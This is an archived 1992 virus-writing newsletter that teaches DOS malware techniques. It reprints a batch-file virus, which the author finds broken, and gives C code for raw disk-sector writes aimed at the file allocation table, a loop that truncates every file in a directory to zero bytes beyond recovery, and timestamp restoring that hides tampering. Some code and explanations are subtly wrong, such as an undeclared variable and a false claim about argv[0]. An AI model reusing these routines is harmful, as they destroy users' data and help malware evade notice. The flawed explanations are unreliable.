home *** CD-ROM | disk | FTP | other *** search
Text File | 2003-06-11 | 58.6 KB | 1,791 lines |
- DISCLAIMER:
- The author will NOT accept responsibility for any damage to your
- computer media and/or files, or responsibility for any action you might
- take that will result in legal proceedings, the source code, if any, in
- this newsletter is THE REAL THING, and you, after you read this, will be
- well aware of what virii are capable of, and knowing that, it is expected
- that you will act responsibly.
-
- DISCLAIMER II:
- All I know about programming I have learned on my own, and did not go to
- school for, and am still learning. As a result, I am sometimes prone to
- make mistakes, and be wrong about things, so please be patient if I should
- make a mistake, or say something that isn't true, which would be totally
- unintentional.
-
-
- Viriisearch
- -----------
-
- The Virus Research Newsletter
-
- Volume 1, Number 2
-
- 7/2/92
-
- CREDITS:
- -----------------------------------------------------------------------------
- Author...................................................Criminal Minded <tm>
- Editor...................................................Criminal Minded <tm>
- Ideas, Source, Examples Supplied By......................Criminal Minded <tm>
- Facts Stolen From Several Sources By.....................Criminal Minded <tm>
- -----------------------------------------------------------------------------
-
- Introduction:
-
- Welcome To The Second Issue Of Viriisearch, The Virus Research Newsletter.
-
- In this issue:
-
- Batch File Virii: How Effective Are They?
-
- Methods Used To Do The Following:
-
- 1. Removing/Altering Attributes On Files
- 2. Writing To The File Allocation Table
- 3. Truncating Files To 0 Bytes (They cannot be recovered with this method,
- but it is rather slow)
- 4. Saving/Restoring File Dates/Times
- 5. Formatting
-
- Fun With COMMAND.COM
- Sample Source Code Of Virii
- "Suicidal Tendencies" Department/Virus Of The Month
- Final Notes
-
- -----------------------------------------------------------------------------
-
- Batch File Virii: How Effective Are They?
-
- -----------------------------------------------------------------------------
-
- This Is A Batch File Virus:
-
- -----------------------------------------------------------------------------
- echo = off
- ctty nul
- path c:\msdos
- dir *.com/w>ind
-
- edlin ind<1
- debug ind<2
- edlin name.bat<3
- ctty con
- name
-
- -----------------------------------------------------------------------------
-
- This is what each line in the batch file does:
-
- Line: What It Does:
- -----------------------------------------------------------------------------
- echo = off Turns Echo Off
- ctty nul Turns Console Output Off
- path c:\msdos Sets up the path in the environment as C:\MSDOS
- dir *.com/w>ind Redirects the output of the command "DIR *.COM/W to a
- File Called "IND"
-
- edlin ind>1 Edits "IND" File Using The Edlin Commands In "1"
- edlin ind>2 Edits "IND" File Using The Edlin Commands In "2"
- edlin name.bat>3 Edits "NAME.BAT" Using The Edlin Commands In "3"
- ctty con Restores Output To The Console
- name Runs NAME.BAT
-
- -----------------------------------------------------------------------------
-
- Contents Of The File "1"
-
- -----------------------------------------------------------------------------
-
- 1,4d ( Here line 1-4 of the "IND" file are deleted )
- e ( Save file )
-
- -----------------------------------------------------------------------------
-
- Contents Of The File "2"
-
- -----------------------------------------------------------------------------
-
- m100,10b,f000 (First program name is moved to the F000H address to save)
-
- e108 ".BAT" (Extention of file name is changed to .BAT)
- m100,10b,f010 (File is saved again)
- e100"DEL " (DEL command is written to address 100H)
- mf000,f00b,104 (Original file is written after this command)
- e10c 2e (Period is placed in from of extension)
- e110 0d,0a (Carrige return+ line feed)
- mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
- e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
- e12b od,0a (COPY command terminated with carriage return + lf)
- rxc ( The CX register is ... )
- 2c ( set to 2CH)
- nname.bat ( Name it NAME.BAT)
- w ( Write )
- q ( quit )
-
- -----------------------------------------------------------------------------
-
- Contents Of The File "3"
-
- -----------------------------------------------------------------------------
-
- 0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
- 1 , 1 ? . . n y y y y y y y
- 0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
- y . 2 , ? ? r . . n n y y y
- 0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
- y y y y . E . . . . . . . . .
-
- -----------------------------------------------------------------------------
-
- Ok, according to the author, this batch file makes use of EDLIN and DEBUG
- and only affects .COM files.
-
- I ran it twice, first on one of my DOS bootable disks. This is the directory
- listing of that disk before I ran this supposed "batch file virus"
-
- Volume in drive A has no label
- Volume Serial Number is 004A-1EC0
- Directory of A:\
-
- COMMAND COM 47845 04-09-91 5:00a
- ANSI SYS 9029 04-09-91 5:00a
- RAMDRIVE SYS 5873 04-09-91 5:00a
- CONFIG SYS 39 01-01-80 12:04a
- SYS COM 13440 04-09-91 5:00a
- NDOS COM 2419 08-14-84 12:00p
- UNDELETE EXE 13924 04-09-91 5:00a
- MEM EXE 39818 04-09-91 5:00a
- SFORMAT EXE 64921 08-05-91 6:01a
- DEBUG EXE 21692 06-07-90 2:24a
- EDLIN EXE 14121 06-07-90 2:24a
- ATTRB EXE 6232 01-01-80 12:21a
- AUTOEXEC BAT 69 01-01-80 12:02a
- NORTON INI 530 01-01-80 12:01a
- VR BAT 112 01-01-80 7:00p
- 1 10 01-01-80 7:01p
- 2 171 01-01-80 7:04p
- 3 269 01-01-80 7:08p
- 18 file(s) 240514 bytes
- 353280 bytes free
-
- -----------------------------------------------------------------------------
-
- Ok, I ran VR.BAT and it accessed the disk for about 30 seconds and then the
- computer froze up. So I rebooted and looked at the disk. There was no file
- damage, but there were four new files on the disk:
-
- IND 120 bytes
- IND.BAK 209 bytes
- NAME.BAT 120 bytes
- NAME.$$$ 0 bytes
-
- -----------------------------------------------------------------------------
-
- This is the contents of "IND"
-
-
- COMMAND.COM SYS.COM NDOS.COM
- 3 file(s) 63704 bytes
- 286720 bytes free
-
- -----------------------------------------------------------------------------
-
- This Is The Contents Of "IND.BAK"
-
- -----------------------------------------------------------------------------
-
- Volume in drive A has no label
- Volume Serial Number is 004A-1EC0
- Directory of A:\
-
- COMMAND.COM SYS.COM NDOS.COM
- 3 file(s) 63704 bytes
- 286720 bytes free
-
- -----------------------------------------------------------------------------
-
- And This Is The Contents Of "NAME.BAT"
-
- -----------------------------------------------------------------------------
- del MMAN.bat. S
- copy \vr.batO
- COMMAN.bat
- 3 file(s) 63704 bytes
- 286720 bytes free
-
- -----------------------------------------------------------------------------
-
- I Then Proceeded To Run NAME.BAT and all that did was give me a "File Not
- Found" And A Few "Bad Command Or Filename"'s
-
- I Am Not Too Sure Of What This Individual Was Attempting To Do, But I Would
- Not Be Too Worried About Him Being Capable Of Doing Anything Malicious To
- Your System As His Batch File Virus Is A Piece Of Shit.
-
- Also, I Created A Directory Called MSDOS On The Disk, Copied COMMAND.COM,
- SYS.COM, And NDOS.COM To That Directory And Ran VR.BAT again. It Did The Same
- Thing As Before, And Did Not Do Any Damage To The Files In The Root Directory
- Or A:\MSDOS
-
- -----------------------------------------------------------------------------
-
- Methods Used To Do The Following:
-
- 1. Removing/Altering Attributes On Files
- 2. Writing To The File Allocation Table
- 3. Truncating Files To 0 Bytes
- 4. Saving/Restoring File Dates/Times
- 5. Formatting
-
- -----------------------------------------------------------------------------
-
- Removing/Altering Attributes On Files:
-
- -----------------------------------------------------------------------------
-
- Here Is A Simple C Language Source To Change The Attributes To Normal On A
- File Called "TEST.DAT"
-
- -----------------------------------------------------------------------------
-
- #include <dos.h>
-
- int main (void);
-
- main()
- {
- _dos_setfileattr("TEST.DAT", _A_NORMAL);
- }
-
- -----------------------------------------------------------------------------
-
- I Think It's Pretty Much Self-Explanatory. <dos.h> Is Just The Header File
- That Has The Prototype For "_dos_setfileattr" In It And The Definition For
- The Manifest Constant "_A_NORMAL"
-
- int main (void);
-
- Is The Function Prototype For "main()" Declaring It To Return Type "int" And
- Is Passed No Parameters (void). This Is Keeping Up With The ANSI Standard.
-
- Then _dos_setfileattr("TEST.DAT",_A_NORMAL);
-
- which does the actual attribute change.
-
- -----------------------------------------------------------------------------
-
- Now, A Complete Utility To Change Attributes That I Wrote On 09/16/91. This
- Is The Third Revision Of It, Version 3.0. I Am Proud Of This Particular
- Version, As The Source Code Is 92 Lines, and 3238 Bytes. The Executable Is
- 9165 Bytes, Which Is Relatively Small. That Just Shows That This Is A Well
- Written Utility, Especially Compared To Version 1.0, Which Was 1/3 Of The
- Lines, And The Executable Was Around 20K.
-
- -----------------------------------------------------------------------------
-
- #include <stdio.h>
- #include <dos.h>
- int count1=0,loop=0;
-
- main(argc,argv)
- int argc;
- char *argv[];
- {
- if (argc != 2) {
- printf("Usage: C>ATTRB <filespec>\n\n");
- printf("File Attributes Changer v3.0 Written By Criminal Minded.\n");
- printf("09/16/91.\n");
- exit(1);
- }
- else {
- struct find_t all_file;
- while (loop!=4) {
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) {
- printf("\nFile(s) do not exist.\n");
- exit(1);
- }
- else {
- printf("1. Normal\n");
- printf("2. Read Only\n");
- printf("3. Hidden\n");
- printf("4. System\n");
- printf("5. Hidden/System/Read Only\n\n");
- printf("Enter Your Choice: ");
- switch(getch()) {
- case '1': loop=4;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("File: %s successfully changed to: NORMAL.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
- case '2': loop=4;
- _dos_setfileattr(all_file.name, _A_RDONLY);
- printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_RDONLY);
- printf("File: %s successfully changed to: READ ONLY.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
- case '3': loop=4;
- _dos_setfileattr(all_file.name, _A_HIDDEN);
- count1++;
- printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_HIDDEN);
- printf("File: %s successfully changed to: HIDDEN.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
- case '4': loop=4;
- _dos_setfileattr(all_file.name, _A_SYSTEM);
- count1++;
- printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_SYSTEM);
- printf("File: %s successfully changed to: SYSTEM.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
- case '5': loop=4;
- _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY);
- count1++;
- printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY);
- printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
- default: loop=5;
- printf("\n\nThat was not a valid menu selection.\n\n");
- printf("Please try again:\n\n");
- break;
- }
- }
- }
- }
- }
-
- -----------------------------------------------------------------------------
-
- "Dissection" Of The Source Code To Attrb v3.0
-
- -----------------------------------------------------------------------------
-
- int count1=0,loop=0;
-
- This Is Just Global Declaration And Inititialization Of Two Integers, Called
- "count1" and "loop"
-
- You Should Always Initialize Your Integers To Zero, Because "C" Can Sometimes
- Assign The Value To The Integer That Is In The Area Of Memory The Compiler
- Sets Aside For The Integer, Which Could Result In Your Program Not Working
- The Way You Wanted It To.
-
- "count1" keeps track of the number of files whose attributes were changed
- through the use of the "increment operator" ( ++ ) which adds the value of 1
- to the integer everytime it changes the attribute on a file.
-
- count1++; /* adds the value of 1 to "count1" */
-
- When there are no more files left to change, it prints the total number of
- files whose attributes were altered with this line:
-
- printf("\n%d Files.\n", count1);
-
- %d is a format specifier, telling the printf function we are printing a int.
- The value to print comes from "count1" at the end, printf looks in there and
- obtains the value, then prints it.
-
- -----------------------------------------------------------------------------
-
- main(argc,argv)
- int argc;
- char *argv[];
-
- -----------------------------------------------------------------------------
-
- This is how command line parameters are incorporated into programs. argc, a
- integer, keeps track of the number of actual parameters passed. char *argv[]
- is the actual parameter. ATTRB v3.0 takes one command line parameter, a file
- specification.
-
- C>ATTRB30 TEST.DAT
-
- With this, argc would = 2, and argv would be as follows:
-
- argv[0] = "C"
- argv[1] = "TEST.DAT"
-
- argv[0] always has "C" in it.
-
-
- Now, how do you make sure the person using the utility entered the command
- line parameter? Like this:
-
- if (argc != 2) {
- printf("Usage: C>ATTRB <filespec>\n\n");
- printf("File Attributes Changer v3.0 Written By Criminal Minded.\n");
- printf("09/16/91.\n");
- exit(1);
- }
-
- argc should equal 2, so the line: if (argc!=2)
-
- is saying: if argc doesn't equal 2 (! means NOT and = means equal)
-
- If argc doesn't equal 2, that means no command line parameter was passed to
- the program, so it carries out the four lines in between the { and the }
- see below:
-
- printf("Usage: C>ATTRB <filespec>\n\n");
- printf("File Attributes Changer v3.0 Written By Criminal Minded.\n");
- printf("09/16/91.\n");
- exit(1);
-
- it tells you the "usage" of the program:
-
- Usage: C>ATTRB <filespec>
-
- telling you it needs one command line parameter, a filespec
-
- then it prints the name of the program, author, and date, and exits with a
- error code of 1.
-
- If argc DOES equal 2, it goes to this part of the program:
-
- Without Comments:
-
- else {
- struct find_t all_file;
- while (loop!=4) {
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) {
- printf("\nFile(s) do not exist.\n");
- exit(1);
- }
-
- With Comments:
-
- else { /* else do this if the parameter is supplied */
-
- struct find_t all_file; /* this tells the program we are going to use the */
- /* structure defined in DOS.H called "find_t" */
- /* see below for a description of "find_t" */
-
- while (loop!=4) { /* will keep going until loop doesn't equal 4 */
-
- /* this next line searches for the filename you specified, using the */
- /* "bitwise OR" operator, | to OR the attribute manifest constants */
- /* together, so it will find any file matching the one you specified */
- /* regardless of the attribute it has. If _dos_findfirst NOT equals */
- /* 0, that means the file you specified doesn't exist, so it tells */
- /* you and exits with a error code of 1 */
- /* Also in this line is where we pass argv[1] over to the "all_file" */
- /* structure, which is the same as the "find_t" structure. We just */
- /* basically changed the name with the line: struct find_t all_file */
-
-
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file) !=0)) {
- printf("\nFile(s) do not exist.\n");
- exit(1);
- }
-
- -----------------------------------------------------------------------------
-
- OK, let me interrupt here for a brief discussion of the "find_t" structure
- declared and defined in "DOS.H"
-
- -----------------------------------------------------------------------------
-
- The "find_t" structure:
-
-
- struct find_t {
- char reserved[21];
- char attrib;
- unsigned wr_time;
- unsigned wr_date;
- long size;
- char name[13];
- };
-
-
- Ok, a structure is just a simple way of organizing data and you won't have to
- declare the data types every time, you could just use the structure.
-
- The members of this structure are:
-
- char reserved[21]; /* character array, can hold 21 chars. Reserved by DOS */
- char attrib; /* holds the attribute */
- unsigned wr_time; /* holds the time of the file */
- unsigned wr_date; /* holds the date of the file */
- long size; /* holds the file size */
- char name[13]; /* holds the filename */
-
- at the end of the structure is: };
-
- this signifies the end of it the structure, but because there is no name
- there, we can rename the structure to anything we line, like we did with the
- line:
-
- struct find_t all_file
-
- now had the structure had a name there, such as:
-
- struct find_t {
- char reserved[21];
- char attrib;
- unsigned wr_time;
- unsigned wr_date;
- long size;
- char name[13];
- } fileinfo;
-
- we couldn't rename the structure. The members of the structure would be
- referred to as:
-
- fileinfo.attrib
- fileinfo.wr_time
- fileinfo.wr_date
- fileinfo.size
- fileinfo.name
-
- but since we renamed the structure to "all_file"
-
- the members are called:
-
- all_file.attrib
- all_file.wr_time
-
- etc and so on...
-
- Get it? Good. Now back to ATTRB v3.0
-
- -----------------------------------------------------------------------------
-
- We left off here:
-
- else {
- struct find_t all_file;
- while (loop!=4) {
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) {
- printf("\nFile(s) do not exist.\n");
- exit(1);
- }
-
- As I said, in the 4th line in the above example, argv[1] is passed over to
- the "all_file" structure, so argv[1] from now on will be referred to as:
-
- all_file.name
-
- If the above part of the program does find a matching file, it will go onto
- this part of the program:
-
- Once again, note the "if else"
-
- In English:
-
- if findfile function doesn't find a matching file, print message and exit.
- else do this:
-
- else {
- printf("1. Normal\n");
- printf("2. Read Only\n");
- printf("3. Hidden\n");
- printf("4. System\n");
- printf("5. Hidden/System/Read Only\n\n");
- printf("Enter Your Choice: ");
-
- easy eh?
-
- you will notice the { and the } throughout the program, those are VERY, VERY
- important in how your program works. I will cover those after I am done with
- explaining how the program works.
-
- Anyway, the above part of the source just displays the simple menu, showing
- your choices. If you select 1, it will change the attributes of the matching
- files to the normal attribute, 2 will make them read only, etc....
-
- This is how it gets the input from the user:
-
- switch(getch()) {
-
- getch() is a function which means "get character"
-
- the "switch" allows the use of "case statements"
-
- -----------------------------------------------------------------------------
-
- case '1': loop=4;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("File: %s successfully changed to: NORMAL.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
-
- -----------------------------------------------------------------------------
-
- 11 lines:
-
- Line 1. Will carry out all the functions after case '1': IF the 1 key is
- pressed. Also on the first line: loop=4;
- This gives the value of 4 to the integer "loop"
-
- Earlier in the code, there was: while (loop!=4)
- Which will keep going until the integer holds a value other than 4
- Since we assign 4 to it at every case statement, it keeps going.
- The purpose of this is if you hit a wrong key, such as 8, which
- isn't available on the menu, it will go to default, where it assigns
- 5 to loop causing it to display this message:
-
- That was not a valid menu selection.
-
- Please try again:
-
- and then "break" out of the loop and go back to the menu, and
- re-display it.
-
- This is how it does it:
-
- default: loop=5;
- printf("\n\nThat was not a valid menu selection.\n\n");
- printf("Please try again:\n\n");
- break;
-
- -----------------------------------------------------------------------------
-
- Now back to "case '1'"
-
- -----------------------------------------------------------------------------
-
- case '1': loop=4;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("File: %s successfully changed to: NORMAL.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
-
- -----------------------------------------------------------------------------
-
- Ok, this picks up where
-
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) {
-
- left off.
-
- _dos_findfirst finds the FIRST matching file and then displays the menu. If
- you select one, it will go to the case '1': statement and change the attribute
- of all_file.name to NORMAL using this line:
-
- _dos_setfileattr(all_file.name, _A_NORMAL);
-
- Then it prints a line telling you the result. %s is another format specifier
- used by printf, like %d mentioned earlier, but %s is to print a string, and
- all_file.name (at the end) contains the string to be printed.
-
- printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name);
-
- Then it adds the value of 1 to count1 to keep track of the total number of
- files attributes were changed on.
-
- count1++;
-
- Once it does all that, it goes onto this part of the code:
-
- while (_dos_findnext(&all_file) == 0) {
- count1++;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("File: %s successfully changed to: NORMAL.\n", all_file.name);
- }
- printf("\n%d Files.\n", count1);
- break;
-
- This is a while loop, until _dos_findnext DOESN'T equal 0, it will keep going
- because as long as it does equal 0, that means there are matching files. The
- next 3 lines have already been explained. Once there are no more files, it
- goes to:
-
- printf("\n%d Files.\n", count1);
- break;
-
- Which prints how many files were changed, breaks out of the loop and exits
- the program.
-
- The only difference between case 1, case 2, case 3, case 4, and case 5, is
- the attribute that the file is changed to.
-
- Case 1: Normal (Can Be Deleted, Written To)
- Case 2: Read Only (Cannot Be Written To Or Deleted)
- Case 3: Hidden (Filename Is Not Seen When You Type DIR, But Still Can Be
- Executed If A .COM, .EXE, or .BAT File, Can Still Be Read If A
- Text File, Etc But Cannot Be Deleted, DOS Replies: File Not Found)
- Case 4: System (Like The File Doesn't Exist. Cannot Be Deleted, Executed Or
- Read)
- Case 5: Hidden/System/Read Only (Combination Of 3, 4 and 5)
-
- -----------------------------------------------------------------------------
-
- A VERY important part of C language are the curly brackets, { and }
-
- We will now go through the code one more time telling what each { and } is
- for.
-
- I will put a number next to each one, like so: [1] and [2] and [3] etc..
-
- at the end of the code, I will tell what each one is for.
-
- -----------------------------------------------------------------------------
-
- #include <stdio.h>
- #include <dos.h>
- int count1=0,loop=0;
-
- main(argc,argv)
- int argc;
- char *argv[];
- { [1]
- if (argc != 2) { [2]
- printf("Usage: C>ATTRB <filespec>\n\n");
- printf("File Attributes Changer v3.0 Written By Criminal Minded.\n");
- printf("09/16/91.\n");
- exit(1);
- } [3]
- else { [4]
- struct find_t all_file;
- while (loop!=4) { [5]
- if ((_dos_findfirst(argv[1], _A_NORMAL|_A_RDONLY|_A_SYSTEM|_A_HIDDEN, &all_file)) { [6]
- printf("\nFile(s) do not exist.\n");
- exit(1);
- } [7]
- else { [8]
- printf("1. Normal\n");
- printf("2. Read Only\n");
- printf("3. Hidden\n");
- printf("4. System\n");
- printf("5. Hidden/System/Read Only\n\n");
- printf("Enter Your Choice: ");
- switch(getch()) { [9]
- case '1': loop=4;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("\n\nFile: %s successfully changed to: NORMAL.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) { [10]
- count1++;
- _dos_setfileattr(all_file.name, _A_NORMAL);
- printf("File: %s successfully changed to: NORMAL.\n", all_file.name);
- } [11]
- printf("\n%d Files.\n", count1);
- break;
- case '2': loop=4;
- _dos_setfileattr(all_file.name, _A_RDONLY);
- printf("\n\nFile: %s successfully changed to: READ ONLY.\n", all_file.name);
- count1++;
- while (_dos_findnext(&all_file) == 0) { [12]
- count1++;
- _dos_setfileattr(all_file.name, _A_RDONLY);
- printf("File: %s successfully changed to: READ ONLY.\n", all_file.name);
- } [13]
- printf("\n%d Files.\n", count1);
- break;
- case '3': loop=4;
- _dos_setfileattr(all_file.name, _A_HIDDEN);
- count1++;
- printf("\n\nFile: %s successfully changed to: HIDDEN.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) { [14]
- count1++;
- _dos_setfileattr(all_file.name, _A_HIDDEN);
- printf("File: %s successfully changed to: HIDDEN.\n", all_file.name);
- } [15]
- printf("\n%d Files.\n", count1);
- break;
- case '4': loop=4;
- _dos_setfileattr(all_file.name, _A_SYSTEM);
- count1++;
- printf("\n\nFile: %s successfully changed to: SYSTEM.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) { [16]
- count1++;
- _dos_setfileattr(all_file.name, _A_SYSTEM);
- printf("File: %s successfully changed to: SYSTEM.\n", all_file.name);
- } [17]
- printf("\n%d Files.\n", count1);
- break;
- case '5': loop=4;
- _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY);
- count1++;
- printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name);
- while (_dos_findnext(&all_file) == 0) { [18]
- count1++;
- _dos_setfileattr(all_file.name, _A_HIDDEN|_A_SYSTEM|_A_RDONLY);
- printf("\nFile: %s successfully changed to: HIDDEN/SYSTEM/READ ONLY.\n", all_file.name);
- } [19]
- printf("\n%d Files.\n", count1);
- break;
- default: loop=5;
- printf("\n\nThat was not a valid menu selection.\n\n");
- printf("Please try again:\n\n");
- break;
- } [20]
- } [21]
- } [22]
- } [23]
- } [24]
-
- -----------------------------------------------------------------------------
-
- For every { there has to be a }
-
- Groups of code, such as particular functions, while loops, switch statements,
- and the main body of the program are enclosed in between { and }
-
- -----------------------------------------------------------------------------
-
- Pairs: What The Are For:
- -----------------------------------------------------------------------------
- [1] [24] Enclose The Main Body Of The Program
-
- [2] [3] Enclose The Body Of Code To Execute If argc Doesn't Equal 2
-
- [4] [21] Enclose The Body Of Code To Execute If argc Does Equal 2
-
- [5] [22] Enclose The Body Of Code To Execute Until loop Doesn't Equal 4
-
- [6] [7] Enclose The Body Of Code To Execute If _dos_findfirst Doesn't
- Find A Matching File
-
- [8] [23] Enclose The Body Of Code To Execute If _dos_findfirst Does
- Find A Matching File
-
- [9] [20] For The Switch Statement Beginning And Ending
-
- [10] [11] Enclose The Body Of Code To Execute While _dos_findnext is
- Still Finding Matching Files (case '1')
-
- [12] [13] Enclose The Body Of Code To Execute While _dos_findnext is
- Still Finding Matching Files (case '2')
-
- [14] [15] Enclose The Body Of Code To Execute While _dos_findnext is
- Still Finding Matching Files (case '3')
-
- [16] [17] Enclose The Body Of Code To Execute While _dos_findnext is
- Still Finding Matching Files (case '4')
-
- [18] [19] Enclose The Body Of Code To Execute While _dos_findnext is
- Still Finding Matching Files (case '5')
-
- -----------------------------------------------------------------------------
-
- By Now I Am Sure You Can See The Importance Of Curly Brackets And Where You
- Place Them In Your Code. I Recall Someone Thinking They Were A Awesome
- Programmer Because They Knew A Few Nice Third Party Commercial C Libraries,
- But The Didn't Know The Language Too Well, And As A Result, He Was Not The
- Great Programmer He Thought He Was.
-
- -----------------------------------------------------------------------------
-
- Writing/Reading The File Allocation Table:
-
- -----------------------------------------------------------------------------
-
- #include <bios.h>
- int main (void);
- main()
- {
- struct diskinfo_t disk_info;
-
- disk_info.drive=2; /* 0 = Drive A, 1 = Drive B, 2 = Drive C */
- disk_info.head=0; /* disk drive head */
- disk_info.track=0; /* track to read from */
- disk_info.sector=1; /* Starting Sector */
- disk_info.nsectors=10; /* Number Of Sectors To Read */
-
- _bios_disk(_DISK_READ,&disk_info);
- }
-
- -----------------------------------------------------------------------------
-
- The Above Code Will Read 10 Sectors Starting At Sector 1 On Track 0, Side 0
- Of Drive C.
-
- The _bios_disk function makes use of the "diskinfo_t" structure in "BIOS.H"
-
- The diskinfo_t structure:
-
- struct diskinfo_t {
- unsigned drive;
- unsigned head;
- unsigned track;
- unsigned sector;
- unsigned nsectors;
- void far *buffer;
- };
-
- -----------------------------------------------------------------------------
-
- If you wanted to write to the disk rather than read from it, replace this
- line:
-
- _bios_disk(_DISK_READ,&disk_info);
-
- With this:
-
- _bios_disk(_DISK_WRITE,&disk_info);
-
- _DISK_READ and _DISK_WRITE are known as 'Manifest Constants' They tell the
- _bios_disk function whether to read or write...
-
- Starting sector and number of sectors will vary depending on the media you
- want to read from or write to the file allocation table (FAT) on.
-
- -----------------------------------------------------------------------------
-
- Truncating Files To 0 Bytes:
-
- -----------------------------------------------------------------------------
-
- #include <fcntl.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <dos.h>
- int main (void);
- main()
- {
- int fh;
- struct find_t find_all;
-
- _dos_findfirst("*.*",_A_NORMAL|_A_RDONLY|_A_HIDDEN|_A_SYSTEM,&find_all);
- _dos_setfileattr(find_all.name,_A_NORMAL);
- fh=open(find_all.name,O_TRUNC);
- close(fh);
- while (_dos_findnext(&all_file) == 0) {
- _dos_setfileattr(find_all.name,_A_NORMAL);
- fh=open(find_all.name,O_TRUNC);
- close(fh);
- }
- }
-
- -----------------------------------------------------------------------------
-
- We've Already Covered _dos_findfirst, _dos_findnext, _dos_setfileattr And
- Structures So We Will Concentrate On The "open" And "close" Functions, Which
- Are Relatively Simple.
-
-
- The Following Line Opens "find_all.name" And The Manifest Constant "O_TRUNC"
- Passed To The "open" Function Causes The File Being Opened To Be Truncated
- To 0 Bytes.
-
- fh=open(find_all.name,O_TRUNC);
-
- And Then We Close The Open Handle, Which Was Passed To The Integer "fh" By
- The "open" Function.
-
- close(fh);
-
-
- When We Close The File, It Gets Written Back To The Disk In The Same Exact
- Spot, But With It's Contents Destroyed. UNERASE (C) Symantec And Similar
- "File Recovery" Utilities Cannot Recover The Files. The Only Drawback To This
- Method Is That It Is Awfully Slow.
-
- -----------------------------------------------------------------------------
-
- Saving/Restoring File Dates/Times:
-
- -----------------------------------------------------------------------------
-
- Below is a C program to change the date and time stamp on a file called
- "TEST.TXT" to 01/01/82 and 1:32am
-
- -----------------------------------------------------------------------------
-
- #include <fcntl.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <dos.h>
- int fh=0;
- unsigned date=0x421;
- unsigned time=0xC0F;
- int main(void);
- main()
- {
- _dos_open("TEST.TXT",O_RDONLY,&fh);
- _dos_setftime(fh,date,time);
- _dos_close(fh);
- }
-
- -----------------------------------------------------------------------------
-
- _dos_open is passed three parameters, the file, the mode to open the file
- with, and a integer.
-
- The file is self explanatory, the mode is O_RDONLY which is read only. It is
- not neccesarry to open the file in a writable mode since we won't actually be
- writing to the file. The filename is passed to the integer "fh"
-
- The next function, _dos_setftime, is passed the integer, "fh", and the date
- and time to set on the file. date and time are unsigned integers. date has
- the hexadecimal value, 0x421, which is: 01/01/82 and time has the hexadecimal
- value, 0xC0F, which is 1:32am. This function sets the specified date and time
- and then the integer "fh" is passed to the _dos_close function, which closes
- the file.
-
- -----------------------------------------------------------------------------
-
- We can preserve the original date and time stamp on a file by using the
- function called "_dos_getftime"
-
- -----------------------------------------------------------------------------
-
- #include <fcntl.h>
- #include <sys\types.h>
- #include <sys\stat.h>
- #include <io.h>
- #include <stdlib.h>
- #include <stdio.h>
- #include <dos.h>
- int fh;
- unsigned date;
- unsigned time;
- int main(void);
- main()
- {
- _dos_open("TEST.TXT",O_RDONLY,&fh);
- _dos_getftime(fh,&date,&time);
- _dos_close(fh);
- }
-
- -----------------------------------------------------------------------------
-
- This program is virtually identical to the previous one except that we use
- _dos_getftime in place of _dos_setftime.
-
- -----------------------------------------------------------------------------
-
